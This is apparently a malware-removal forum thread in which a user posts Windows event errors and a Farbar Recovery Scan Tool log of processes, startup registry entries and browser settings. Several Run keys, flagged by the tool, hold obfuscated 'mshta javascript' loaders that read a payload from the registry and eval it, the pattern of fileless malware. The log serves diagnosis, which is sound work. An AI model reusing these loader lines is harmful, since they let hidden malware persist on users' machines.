Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (06/28/2015 11:13:13 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NVIDIA Update Service Daemon service failed to start due to the following error:
%%1069

Error: (06/28/2015 11:13:13 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The nvUpdatusService service was unable to log on as .\UpdatusUser with the currently configured password due to the following error:
%%1330

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (06/28/2015 11:11:08 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
SCDEmu

Error: (06/28/2015 11:10:04 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 10:59:54 AM on ‎6/‎28/‎2015 was unexpected.

Error: (06/28/2015 10:20:47 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (06/28/2015 08:41:48 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NVIDIA Update Service Daemon service failed to start due to the following error:
%%1069

Error: (06/28/2015 08:41:48 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The nvUpdatusService service was unable to log on as .\UpdatusUser with the currently configured password due to the following error:
%%1330

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (06/28/2015 08:39:46 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
SCDEmu

Error: (06/28/2015 08:04:59 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NVIDIA Update Service Daemon service failed to start due to the following error:
%%1069

Error: (06/28/2015 08:04:59 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The nvUpdatusService service was unable to log on as .\UpdatusUser with the currently configured password due to the following error:
%%1330

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).


Microsoft Office:
=========================
Error: (06/28/2015 11:08:23 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


==================== Memory info ===========================

Processor: Intel® Core™2 Quad CPU Q8200 @ 2.33GHz
Percentage of memory in use: 43%
Total physical RAM: 8191.05 MB
Available physical RAM: 4591.64 MB
Total Pagefile: 16380.3 MB
Available Pagefile: 12245.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:931.06 GB) (Free:375.97 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 8CDB8CDB)
Partition 1: (Active) - (Size=931.1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=450 MB) - (Type=27)

==================== End of log ============================



#4 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:12:15 AM

Posted 28 June 2015 - 10:46 AM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:28-06-2015
Ran by User (administrator) on USER-PC on 28-06-2015 11:38:04
Running from C:\Users\User\Downloads
Loaded Profiles: User &  (Available Profiles: User & UpdatusUser)
Platform: Windows 7 Ultimate Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\LogiShrd\LVMVFM\UMVPFSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(ABBYY) C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
() C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe
(Facebook Inc.) C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
() C:\Program Files (x86)\Standard Mouse Driver\Monitor.EXE
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
() C:\Program Files (x86)\Common Files\LogiShrd\LQCVFX\COCIManager.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8306208 2009-10-21] (Realtek Semiconductor)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2399632 2011-04-13] (Microsoft Corporation)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [AdAwareTray] => C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe [7715160 2014-06-03] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [558496 2014-02-27] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2754704 2015-06-03] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [205336 2011-11-11] (Logitech Inc.)
HKLM-x32\...\Run: [hpqSRMon] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe [150528 2008-07-22] (Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)
HKLM-x32\...\Run: [Standard Mouse Driver] => C:\Program Files (x86)\Standard Mouse Driver\Monitor.exe [147456 2013-01-04] ()
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3727824 2015-06-16] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKLM-x32\...\Run: [**709fbb63<*>] => mshta javascript:uRKcL2L="B67grvqg";Ad5=new%20ActiveXObject("WScript.Shell");bHB62gNlR="xG4zWA";YPZk55=Ad5.RegRead("HKLM\\software\\Wow6432Node\\1838e86e\\8f497142");lNRnSl4h9="NmnkFeWdF6";eval(YPZk55 (the data entry has 21 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Run: [Facebook Update] => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-10-23] (Facebook Inc.)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Run: [**709fbb63<*>] => mshta javascript:B2cMtNA="mc";gk9=new%20ActiveXObject("WScript.Shell");L7qrLdY5="DalYL4qzu";LB7K1i=gk9.RegRead("HKCU\\software\\1838e86e\\8f497142");ZEZyWG2b="hEx";eval(LB7K1i);Nnuj7nMuz="w10FsX01a"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Policies\Explorer: [NoThumbnailCache] 1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: G - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {981766c1-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {98176738-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {cc63ea89-0f29-11e1-b2ce-f46d042209a7} - E:\SETUP.EXE
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {de1a752a-f825-11e3-a0e8-f46d042209a7} - D:\INSTALL.EXE
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Facebook Update] => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-10-23] (Facebook Inc.)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [**709fbb63<*>] => mshta javascript:B2cMtNA="mc";gk9=new%20ActiveXObject("WScript.Shell");L7qrLdY5="DalYL4qzu";LB7K1i=gk9.RegRead("HKCU\\software\\1838e86e\\8f497142");ZEZyWG2b="hEx";eval(LB7K1i);Nnuj7nMuz="w10FsX01a"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\Explorer: [NoThumbnailCache] 1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: G - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {981766c1-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {98176738-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {cc63ea89-0f29-11e1-b2ce-f46d042209a7} - E:\SETUP.EXE
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {de1a752a-f825-11e3-a0e8-f46d042209a7} - D:\INSTALL.EXE
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2012-05-08]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
ShellIconOverlayIdentifiers: [SmartFTP Drop] -> {EA5A76F7-8138-4B53-B0F5-ADCC730CAFBD} => C:\Program Files\SmartFTP Client\sfShellTools.dll [2012-01-24] (SmartSoft Ltd.)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ca.msn.com/?rd=1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = https://ca.yahoo.com?fr=hp-avast&type=avastbcl
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ca.msn.com/?rd=1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Bar = https://ca.yahoo.com?fr=hp-avast&type=avastbcl
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 - (No Name) - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - No File
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 - (No Name) - {167d9323-f7cc-48f5-948a-6f012831a69f} - No File
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 - (No Name) - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - No File
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 - (No Name) - {167d9323-f7cc-48f5-948a-6f012831a69f} - No File
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKLM -> {7BE09713-A09C-4448-85E9-761960ED1D82} URL =
SearchScopes: HKLM-x32 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://ca.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://ca.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1060933
SearchScopes: HKU\.DEFAULT -> DefaultScope {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> DefaultScope {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {7BE09713-A09C-4448-85E9-761960ED1D82} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {7BE09713-A09C-4448-85E9-761960ED1D82} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} ->  No File
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} ->  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> No Name - {1392B8D2-5C05-419F-A8F6-B9F15A596612} -  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> No Name - {167D9323-F7CC-48F5-948A-6F012831A69F} -  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> No Name - {1392B8D2-5C05-419F-A8F6-B9F15A596612} -  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> No Name - {167D9323-F7CC-48F5-948A-6F012831A69F} -  No File
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} https://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -  No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{CFE71FFE-A42B-4FF5-8BE2-630EEA744AFD}: [DhcpNameServer] 192.168.2.1

FireFox:
========
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_188.dll [2015-06-04] ()
FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2011-06-19] (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_188.dll [2015-06-04] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1218158.dll [2015-04-27] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2011-06-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2011-11-05] (Nexon)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin-x32: @ogplanet.com/npOGPPlugin -> C:\Windows\system32\npOGPPlugin.dll No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin-x32: @qq.com/TXSSO -> C:\Program Files (x86)\Common Files\Tencent\TXSSO\1.2.1.94\Bin\npSSOAxCtrlForPTLogin.dll [2013-01-24] (Tencent)
FF Plugin-x32: @tiancity.com/NxGame -> C:\ProgramData\Tiancity\NGM\npNxGameCN.dll [2013-11-13] (Nexon)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-15] (Google Inc.)
